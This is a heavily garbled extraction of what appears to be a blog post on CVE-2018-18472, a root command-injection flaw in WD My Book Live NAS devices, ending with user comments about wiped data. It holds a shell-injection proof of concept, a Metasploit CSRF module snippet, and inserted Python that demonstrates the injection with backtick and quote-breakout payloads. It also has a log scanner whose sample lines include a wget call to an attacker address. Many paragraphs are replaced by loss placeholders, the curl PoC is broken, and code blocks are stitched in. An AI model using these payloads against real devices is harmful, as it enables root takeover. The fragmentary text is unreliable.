What is the reputation, or is there a custom fix, for CVE-2018-18472 on WD NAS devices?

For the much-discussed story of the Western Digital NAS wipe, read the post by @ZlodeiBaal: Western Digital wiped most users' NAS devices





Here we will also try to fix a vulnerability which, as it turned out, is 7 years old (2014) and which Western Digital brushed off 3 days ago with the following paragraph:





"The My Book Live series was introduced to the market in 2010 and these devices received their final firmware update in 2015." [1]





17 hours ago, user dracenmarx posted the following instructions for fixing a remote code execution (RCE) bug:





  • SSH in and edit the file (for example with nano):





  • /var/www/Admin/webapp/includes/languageConfiguration.php





  • First change; find:





exec("sudo bash -c '(echo \"language {$changes["language"]}\">/etc/language.conf)'", $output, $retVal);
      
      



  • Replace with:





if (!preg_match('/^[a-z]{2}_[A-Z]{2}$/', $changes["language"], $dummy)) return 'BAD_REQUEST';
exec("sudo bash -c '(echo '\"'\"".escapeshellarg("language {$changes["language"]}")."\"'\"'>/etc/language.conf)'", $output, $retVal);
      
      



  • Second change; find:





exec("sudo bash -c '(echo \"language {$lang["language"]}\">/etc/language.conf)'", $output, $retVal);
      
      



  • Replace with:





if (!preg_match('/^[a-z]{2}_[A-Z]{2}$/', $lang["language"], $dummy)) return 'BAD_REQUEST';
exec("sudo bash -c '(echo '\"'\"".escapeshellarg("language {$lang["language"]}")."\"'\"'>/etc/language.conf)'", $output, $retVal);
      
      



Beyond that, according to him, he found no similar bugs.
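To see why the unpatched exec() string is exploitable and why the patch holds, here is an added example (not code from the page, from dracenmarx or from WD) that re-implements both PHP lines in Python so they can be run locally. Assumptions: subprocess.run(shell=True) stands in for PHP's exec(), since both hand the string to /bin/sh -c; a file in a temporary directory stands in for /etc/language.conf; sudo is dropped (on the NAS it is what turns the injection into root execution); sh -c replaces bash -c so nothing beyond /bin/sh is needed; and the canary payloads are constructed for the demonstration.

```python
"""Model of the My Book Live language_configuration command injection.

Added example, not code from the page, from dracenmarx or from WD. It
re-implements the two PHP exec() strings in Python: subprocess.run(shell=True)
stands in for exec(), a temp file for /etc/language.conf, sudo is dropped and
`sh -c` replaces `bash -c`.
"""
import os
import re
import shlex
import subprocess
import tempfile

# Allow-list from the patch: a locale such as en_US, nothing else.
LANG_RE = re.compile(r'^[a-z]{2}_[A-Z]{2}$')


def vulnerable_command(language, conf_path):
    """Unpatched line: the value is interpolated raw inside a double-quoted echo,
    itself inside a single-quoted `sh -c` body. Inside the inner shell's double
    quotes, backticks and $(...) still expand, and a single quote in the value
    even breaks out to the outer shell that exec() spawned."""
    return "sh -c '(echo \"language %s\">%s)'" % (language, conf_path)


def hardened_command(language, conf_path):
    """Patched line. None models the PHP `return 'BAD_REQUEST'`. shlex.quote()
    plays the role of escapeshellarg(); the '"'"' dance closes the outer single
    quotes, emits a literal ', and reopens them, so the inner shell receives
    echo 'language en_US'. The regex is the real control: a value holding a
    single quote would survive escapeshellarg() but unbalance the inner quoting."""
    if not LANG_RE.match(language):
        return None
    quoted = shlex.quote("language " + language)
    return "sh -c '(echo '\"'\"" + quoted + "\"'\"'>" + conf_path + ")'"


def exercise(builder, make_language):
    """Run one request against a throwaway config file.

    make_language(canary_path) returns the attacker-controlled `language`
    value; an injected command that manages to create canary_path proves
    code execution. Returns (status, conf_contents, canary_created)."""
    with tempfile.TemporaryDirectory() as d:
        conf = os.path.join(d, "language.conf")
        canary = os.path.join(d, "pwned")
        cmd = builder(make_language(canary), conf)
        if cmd is None:
            return ("BAD_REQUEST", None, False)
        subprocess.run(cmd, shell=True, check=False,
                       stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        contents = open(conf).read() if os.path.exists(conf) else None
        return ("OK", contents, os.path.exists(canary))


def backtick_payload(canary):
    """Shape of the WizCase PoC: a backticked command inside the value."""
    return "`touch %s`" % canary


def quote_breakout_payload(canary):
    """A single quote closes the outer sh -c string; what follows runs there."""
    return "'; touch %s; echo '" % canary


if __name__ == "__main__":
    for name, builder in (("vulnerable", vulnerable_command), ("hardened", hardened_command)):
        for label, mk in (("en_US", lambda c: "en_US"),
                          ("backtick", backtick_payload),
                          ("quote", quote_breakout_payload)):
            print(name, label, exercise(builder, mk))
```

Running it shows that the unpatched string executes a backticked command from inside the inner shell's double quotes, and that a single quote in the value breaks out of the outer sh -c layer altogether, so the config write fails while the injected command still runs. In the patched version the regex is the control that matters: escapeshellarg() wraps the value in single quotes, but a value containing a single quote would come out as '\'' and unbalance the inner echo, so the quoting only stays correct for values the allow-list already accepted.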





[Paragraph lost in extraction; only the words sudo, sudoers, exec and STDOUT survive.]





[Sentence lost in extraction; it refers to dracenmarx, 2018 and the CVE entry https://cve.circl.lu/cve/CVE-2018-18472 (WizCase).]





From the CVE entry: Western Digital WD My Book Live (all versions) has a root Remote Command Execution bug via shell metacharacters in the /api/1.0/rest/language_configuration language parameter. It can be triggered by anyone who knows the IP address of the affected device.





[Sentence lost in extraction.] The WizCase PoC:





curl -kX GET -d 'bim=param`whoami`https:///panel/rest/configuration
      
      



[Comment text lost in extraction; it concerns WD in 2018.] - dracenmarx, 26th





[Lead-in lost in extraction.] dracenmarx:





[Comment text lost in extraction; it connects CVE-2018-18472 with a 2014 bug (WDMyCloud Command Injection CSRF) and MyBookLive/WD.] - dracenmarx, 26th





[Sentence lost in extraction; it mentions the 20th of a month in 2014 and Metasploit.] The module's metadata:





Name: WDMyCloud NAS Command Injection CSRF





Description: This module exploits a command injection vulnerability in the web interface of the WDMyCloud NAS device, via CSRF. It will submit the CSRF request to RHOST, as well as wdmycloud and wdmycloud.local.





DisclosureDate: 0 day, yo





[Sentence lost in extraction; it mentions 3 of something and the NAS.]





params = "format=xml&rest_method=PUT&language=" + Rex::Text.uri_encode("`#{payload.encoded}`")
...
<html>
<body>
<h1>Redirecting... Please Wait</h1>
<div style='display:none'>
<img src='http://wdmycloud.local/api/1.0/rest/language_configuration?#{params}' />
<img src='http://wdmycloud/api/1.0/rest/language_configuration?#{params}' />
<img src='http://#{datastore['RHOST']}/api/1.0/rest/language_configuration?#{params}' />
</div>
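The two traits of this vector, a GET that tunnels a PUT through rest_method and a language value that is not a locale, are easy to pick out of the device's web-server access log. The following detection logic is an added example, not from the page, the module or WD; it assumes Apache combined-format log lines (the four lines below are constructed for the demonstration) and that the NAS's own hostnames, wdmycloud and wdmycloud.local from the module, are the only trusted referers.

```python
"""Scan access-log lines for abuse of /api/1.0/rest/language_configuration.

Added example, not code from the page, the CSRF module or WD. Assumes
Apache combined log format; the sample lines are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/api/1.0/rest/language_configuration"
# Same allow-list as the dracenmarx patch: anything else in `language` is suspect.
LANG_RE = re.compile(r'^[a-z]{2}_[A-Z]{2}$')
# ip ident user [timestamp] "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "[^"]*"$')


def analyse_line(line, trusted_hosts):
    """Return a finding dict for a suspicious request to ENDPOINT, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status, referer = m.groups()
    url = urlsplit(target)
    if url.path != ENDPOINT:
        return None
    # parse_qs percent-decodes, so %60id%60 comes back as `id`
    params = parse_qs(url.query, keep_blank_values=True)
    reasons = []
    language = params.get("language", [None])[0]
    if language is not None and not LANG_RE.match(language):
        reasons.append("language=%r is not a plain locale" % language)
    rest_method = params.get("rest_method", [None])[0]
    if method == "GET" and rest_method and rest_method.upper() != "GET":
        reasons.append("GET tunnels %s through rest_method (CSRF-friendly)" % rest_method.upper())
    if referer and referer != "-":
        host = urlsplit(referer).hostname or ""
        if host not in trusted_hosts:
            reasons.append("cross-site referer %s" % host)
    if not reasons:
        return None
    return {"ip": ip, "time": ts, "status": status, "reasons": reasons}


def scan(lines, trusted_hosts=("wdmycloud", "wdmycloud.local")):
    """Analyse every line and return the list of findings, in log order."""
    findings = []
    for line in lines:
        f = analyse_line(line, set(trusted_hosts))
        if f:
            findings.append(f)
    return findings


# Constructed sample log, Apache combined format: one legitimate PUT, one
# CSRF-style GET with a backticked payload, one direct curl with a `;` chain,
# one unrelated page hit.
SAMPLE_LOG = [
    '192.168.1.20 - - [26/Jun/2021:10:00:00 +0000] "PUT /api/1.0/rest/language_configuration?language=en_US HTTP/1.1" 200 52 "http://wdmycloud.local/UI/" "Mozilla/5.0"',
    '192.168.1.33 - - [26/Jun/2021:10:01:12 +0000] "GET /api/1.0/rest/language_configuration?format=xml&rest_method=PUT&language=%60id%60 HTTP/1.1" 200 52 "http://evil.example/" "Mozilla/5.0"',
    '203.0.113.9 - - [26/Jun/2021:10:02:40 +0000] "GET /api/1.0/rest/language_configuration?language=en_US%3Bwget%20http://203.0.113.9/x HTTP/1.1" 200 52 "-" "curl/7.64.1"',
    '192.168.1.20 - - [26/Jun/2021:10:03:05 +0000] "GET /UI/ HTTP/1.1" 200 1024 "http://wdmycloud.local/UI/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["time"], "; ".join(f["reasons"]))
```

The rest_method check is the one worth keeping even on patched firmware: a REST layer that lets a plain GET act as a PUT is what makes an <img> tag sufficient for CSRF, whatever the parameter validation does.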
      
      



[Paragraph lost in extraction; it points at the language parameter and at 2014.]





[Paragraph lost in extraction; it mentions the 11th of a month in 2014, the 29th of a month in 2015 and a PR :)]





[Paragraph lost in extraction; it refers to the gist at https://gist.github.com/phikshun, the 7 years, and WD in 2018, and introduces the statement below:]





The vulnerability report CVE-2018-18472 affects My Book Live devices originally introduced to the market between 2010 and 2012. These products have been discontinued since 2014 and are no longer covered under our device software support lifecycle. We encourage users who wish to continue operating these legacy products to configure their firewall to prevent remote access to these devices, and to take measures to ensure that only trusted devices on the local network have access to the device.





Western Digital takes the security of our customers’ data seriously, and we provide security updates for our products to address issues from both external reports and regular security audits. Additionally, we welcome the opportunity to work with members of the security research community through responsible disclosure to help protect our users. [...]





- WizCase





[Closing paragraphs lost in extraction; only the words B2B, MBA and IT survive.]

[Paragraph on data recovery lost in extraction; it names TestDisk/PhotoRec, dd and openssl, and introduces the following user comments:]





I got a quote for data recovery and it was $2,000 to $5,000. Unbelievable. - mkennedy





Another affected user here in Canada. I had no idea there was an issue until I read the email from WD this afternoon. I checked the drive and sure enough, only the default folders were there. I unplugged the drive and here we are. I’m a hobby photographer, approximately 80,000 photos gone. I’m on the support chat waitlist, it’s been 11 seconds remaining for the past 20 minutes so I’m not holding my breath. - damack604







